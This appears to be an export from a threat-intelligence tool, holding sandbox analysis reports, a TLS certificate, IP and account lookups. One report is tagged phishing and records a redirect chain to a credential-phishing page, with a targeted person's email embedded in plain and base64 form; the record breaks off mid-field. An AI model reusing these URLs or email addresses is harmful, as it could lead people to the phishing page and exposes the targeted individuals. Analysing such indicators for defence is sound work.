| 2023-05-12 02:51:15 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c04_IE_EarlyTabStart_0x8b0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.66.40.106:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "191.101.3.40:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "llink.to"\n "track.salesflare.com"\n "west.exchserverdata.one"\n "www.guelphcrc.ca"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "CabB51E.tmp" has type "data"- Location: [%TEMP%\\CabB51E.tmp]- [targetUID: 00000000-00002300]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFEEE2751A29384183.TMP" has type "data"- Location: [%TEMP%\\~DFEEE2751A29384183.TMP]- [targetUID: 00000000-00003076]\n "~DFFC90A9F2586EA360.TMP" has type "data"- Location: [%TEMP%\\~DFFC90A9F2586EA360.TMP]- [targetUID: 00000000-00003076]\n "~DFEF4FBE98200F22B4.TMP" has type "data"- Location: [%TEMP%\\~DFEF4FBE98200F22B4.TMP]- [targetUID: 00000000-00003076]\n "~DFE92125FE943442B9.TMP" has type "data"- Location: [%TEMP%\\~DFE92125FE943442B9.TMP]- [targetUID: 00000000-00003076]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "_BCFD0E53-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._BCFD0E51-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C766E17C-EF26-11ED-9359-0800270C9882_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002300]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "PZ85YNQQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PZ85YNQQ.txt]- [targetUID: 00000000-00003076]\n "P9VT4ER8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P9VT4ER8.txt]- [targetUID: 00000000-00003076]\n "QUTHNHLH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QUTHNHLH.txt]- [targetUID: 00000000-00003076]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "EAMNLP61.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EAMNLP61.txt]- [targetUID: 00000000-00003076]\n "benjamin.mckenzie@atimetals_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "II6KA114.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\II6KA114.txt]- [targetUID: 00000000-00003076]\n "B2FNP7N6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B2FNP7N6.txt]- [targetUID: 00000000-00003076]\n "QO8K1B53.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QO8K1B53.txt]- [targetUID: 00000000-00003076]\n "CabB51F.tmp" has type "data"- Location: [%TEMP%\\CabB51F.tmp]- [targetUID: 00000000-00002300]\n "CabC118.tmp" has type "data"- Location: [%TEMP%\\CabC118.tmp]- [targetUID: 00000000-00002300]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002300]\n "CabC13A.tmp" has type "data"- Location: [%TEMP%\\CabC13A.tmp]- [targetUID: 00000000-00002300]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "6O2TX2Q0.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\6O2TX2Q0.htm]- [targetUID: 00000000-00002300]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.guelphcrc.ca" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fbenjamin.mckenzie%40atimetals.com"\n Pattern match: "https://llink.to"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115_EDGE_Vmicrosoft.com/921614563724831110587320756521031032115SRCHDAF=NOFORMmicrosoft.com/10243323789440310856102"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115MUID31E817B6939460D9349A04BB92D861F2microsoft.com/102514563724831110587320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0"\n Pattern match: "SUIDmicrosoft.com/92161314803231032233320740896031032115SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131micr"\n Pattern match: "921614563724831110587321084646031032115MUID1C22022E23466767041B1123220A6603msn.com/102514563724831110587321084646031032115"\n Pattern match: "https://west.exchserverdata.one/?email=YmVuamFtaW4ubWNrZW56aWVAYXRpbWV0YWxzLmNvbQ=="\n Pattern match: "MUIDB31E817B6939460D9349A04BB92D861F2ieonline.microsoft.com/921614563724831110587320756521031032115"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025103905676831068342321084646031032115"\n Pattern match: | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605ceb464381-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:55:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:28:ae:be:17:84:18:1b:e1:bf:c2:45:52:c1:
a5:6a:08:4a:bc:c1:e3:a4:de:5e:d0:05:9f:d6:99:
22:94:16:f7:d2:69:68:71:09:4a:62:e7:41:0d:0a:
be:3e:3b:51:6d:0b:4a:0f:76:3a:b0:8e:cb:56:a6:
21:8f:de:9f:c1:45:ea:d1:38:90:03:24:5c:77:6f:
cd:06:86:05:00:ae:fc:49:fe:8f:e8:85:de:e7:e4:
d0:99:c5:ad:e4:c5:9c:9a:95:9e:97:20:79:ed:7e:
c1:65:47:a7:ce:2c:b4:2b:9e:4c:1f:8e:21:8f:4e:
cf:f7:3e:4f:ff:b2:88:aa:90:dd:b7:be:8a:db:d2:
17:66:cc:6f:09:3d:67:e8:3c:91:39:a6:90:69:62:
e9:f2:9c:b4:d3:ba:96:0b:b2:0e:b2:74:eb:8a:64:
f6:d7:18:6c:22:f7:1e:bc:17:2f:20:0c:dc:30:1b:
5e:7d:a8:0b:34:ce:8a:75:55:4f:72:8b:d6:d7:dc:
63:55:19:dd:2a:a0:25:0a:50:bd:17:df:74:d9:8e:
df:7b:ba:19:b8:f5:47:fd:97:bf:18:2b:99:ec:f3:
58:72:eb:64:34:43:28:b7:d3:7f:de:05:80:58:fb:
f6:05:86:02:1c:8d:eb:d5:23:a1:08:9a:01:84:aa:
05:5a:57:5b:4f:80:96:8a:65:18:8f:fb:bb:dd:91:
f1:8e:b1:05:2f:76:93:8f:28:86:73:78:5c:d4:fe:
b8:81:83:79:71:79:e9:31:46:fb:22:a9:30:c3:0b:
03:79:d0:e6:24:cf:e4:e0:cb:3e:91:71:20:ec:40:
44:0f:22:88:b4:5a:5f:cd:f2:41:b7:a9:21:3e:74:
54:3b:a0:07:32:4e:5c:e7:71:a3:33:95:bd:ee:27:
4a:b2:53:d1:06:de:2c:39:7b:83:7f:1c:cf:0a:28:
32:ef:07:d4:d3:ef:a5:9d:8a:8a:36:97:d5:6f:97:
57:8e:aa:22:4e:6c:70:6c:aa:43:59:1c:d0:88:a6:
26:22:1b:20:62:45:6e:6e:62:40:f6:bf:20:b1:b8:
43:17:25:80:1d:c9:c1:63:ed:d3:a8:bc:4b:68:5d:
f2:19:96:37:4a:82:70:a9:86:22:f6:56:84:02:f9:
b4:a7:6c:3d:03:4c:59:fe:71:81:0a:71:7e:9e:7c:
1a:5d:b6:ce:77:db:f9:80:a5:2d:65:a3:96:1f:c9:
ca:a0:c7:b0:9d:21:28:db:1c:6a:4c:c7:37:20:39:
9f:b7:63:e2:80:c5:2d:53:fd:3e:c8:1a:cf:e7:76:
9f:bc:92:4a:58:81:84:d1:30:a4:4e:12:c7:e5:10:
eb:dc:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:03.171 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:96:05:95:D9:0A:4B:A3:9F:B3:54:99:
3D:9F:1C:1C:B3:12:27:04:D0:20:E1:F2:2F:C1:45:57:
B6:CE:43:39:BB:02:20:00:C0:44:63:1A:7F:1F:D9:F8:
FD:B5:9E:08:05:34:0B:45:8D:91:19:03:CA:A5:AA:D6:
E1:FD:44:B5:26:35:45
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:03.648 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:9E:83:39:0E:B7:7E:92:F8:91:94:2D:
C4:39:B4:D1:61:0F:10:40:37:17:81:C1:64:FE:E3:2B:
7F:80:28:64:1B:02:20:24:5F:97:C1:F8:98:B3:7F:80:
98:C6:50:33:A7:E2:50:93:AF:06:19:6A:DF:BA:37:94:
1F:D4:D6:CD:5F:4C:B0
Signature Algorithm: sha256WithRSAEncryption
40:a0:9d:f6:3d:3c:ac:ae:91:12:9b:4e:a3:fc:45:ec:e5:64:
da:45:37:2c:ee:d8:2a:d2:8f:88:31:a0:95:c3:dc:c4:40:0e:
a8:93:80:23:39:bf:89:3d:dd:29:75:89:26:f6:5c:52:03:15:
6f:e8:31:57:f9:25:b3:bd:ee:60:ab:89:7b:bf:4a:3b:90:d7:
1d:6e:f0:15:a6:a8:33:e3:0a:a3:63:24:df:b6:b2:88:74:9c:
53:ba:d0:31:ab:00:8b:eb:a4:eb:bb:ba:98:6b:22:46:8c:5e:
84:5b:6e:2e:cc:c4:3d:09:cd:d2:87:a3:5d:75:e5:ec:73:75:
14:60:08:bd:90:75:45:e0:a0:1e:53:73:ca:fb:93:72:15:2f:
6a:41:43:d4:73:dd:23:81:1a:84:6d:10:98:76:2d:ce:b5:a3:
74:e9:cc:ad:0f:8c:bd:73:70:b3:fe:0a:4e:d0:aa:f9:06:ca:
2e:6d:c1:ec:f4:03:98:d8:dd:ea:da:88:14:c5:af:7a:46:c1:
65:1f:db:ea:14:67:fb:45:d8:16:12:e2:c1:56:a5:f6:63:45:
0e:7f:b7:be:8a:a0:59:b7:47:0c:b8:cc:46:e6:d5:5e:8d:78:
17:a9:cd:35:86:26:df:ba:4a:09:fb:46:5e:4a:81:95:bb:26:
df:1f:91:9c
| battleb0t.xyz |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.73 | 34.74.170.74 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=Battleb0t | Battleb0t |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://goo.gl/uqaWYa', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1736"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6c8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_6c8_ConnHashTable<1736>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"74.208.236.106:80"\n "74.208.236.106:443"\n "172.217.12.106:443"\n "104.18.10.207:443"\n "185.199.109.153:443"\n "142.250.72.202:443"\n "142.251.214.131:443"\n "142.250.189.206:443"\n "142.251.214.130:443"\n "142.251.46.230:443"\n "142.251.46.170:443"\n "52.155.62.95:443"\n "172.217.12.118:443"\n "172.217.12.97:443"\n "142.250.189.238:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"chrisfixed.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "chrisfixed.com"\n "fe0.google.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "goo.gl"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "play.google.com"\n "query.prod.cms.msn.com"\n "stackpath.bootstrapcdn.com"\n "static.doubleclick.net"\n "teredo.ipv6.microsoft.com"\n "trenta.media"\n "www.chris-fix.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "VISITOR_INFO1_LIVEziB5upP7Wiwyoutube.com/214749286534253099523106746390550359831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "5O0LJ4LH.txt")\n Found string "VISITOR_INFO1_LIVEDU_B5bFhQnkyoutube.com/214749286534253099523106746390472234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "DQKYX181.txt")\n Found string "VISITOR_INFO1_LIVEi1ZA35yJPt8youtube.com/214749286534253099523106746390597234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7JFMJ9XY.txt")\n Found string "VISITOR_INFO1_LIVE-bsB1yN3wW0youtube.com/214749286534253099523106746390784734831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7E6JY8J0.txt")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "function bz(a,b){var c=this;return b}bz.M="internal.enableAutoEventOnScroll";var bc=ca(["data-gtm-yt-inspected-"]),cz=["www.youtube.com","www.youtube-nocookie.com"],dz,ez=!1;" (Indicator: "dir "; File: "js_2_.js")\n Found string "www.youtube.com" (Indicator: "dir "; File: "PCAP")\n file/memory contains long string with (Indicator: "dir "; File: "SSL")\n file/memory contains long string with (Indicator: "dir "; File: "base_1_.js")\n Found string "{Bo:"r",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("gam_native_web_video")?{Bo:"n",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("admob_interstitial_video")?{Bo:"int",Do:Eo()}:{Bo:"j",Do:null}};" (Indicator: "dir "; File: "base_1_.js")\n Found string "By=function(a){a=g.Si(a);a=null!==a?a.split(".").reverse():null;return null===a?!1:"com"==a[0]&&a[1].match(/^youtube(?:kids|-nocookie)?$/)?!0:!1};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Uy=function(a,b,c,d,e){Sy||Ty.set(""+a,b,{IG:c,path:"/",domain:void 0===d?"youtube.com":d,W8:void 0===e?!1:e})};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Wy=function(a,b,c){Sy||Ty.remove(""+a,void 0===b?"/":b,void 0===c?"youtube.com":c)};" (Indicator: "dir "; File: "base_1_.js")\n Found string "sna=function(){this.j=g.hy("ALT_PREF_COOKIE_NAME","PREF");this.u=g.hy("ALT_PREF_COOKIE_DOMAIN","youtube.com");var a=g.Vy(this.j);a&&this.parse(a)};" (Indicator: "dir "; File: "base_1_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"insta-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "twitter-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "fb-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "sddefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "sddefault_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "yt-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "unnamed_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 Exif Standard: [TIFF image data little-endian direntries=1 software=Google] baseline precision 8 68x68 components 3" and extension "jpg"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file 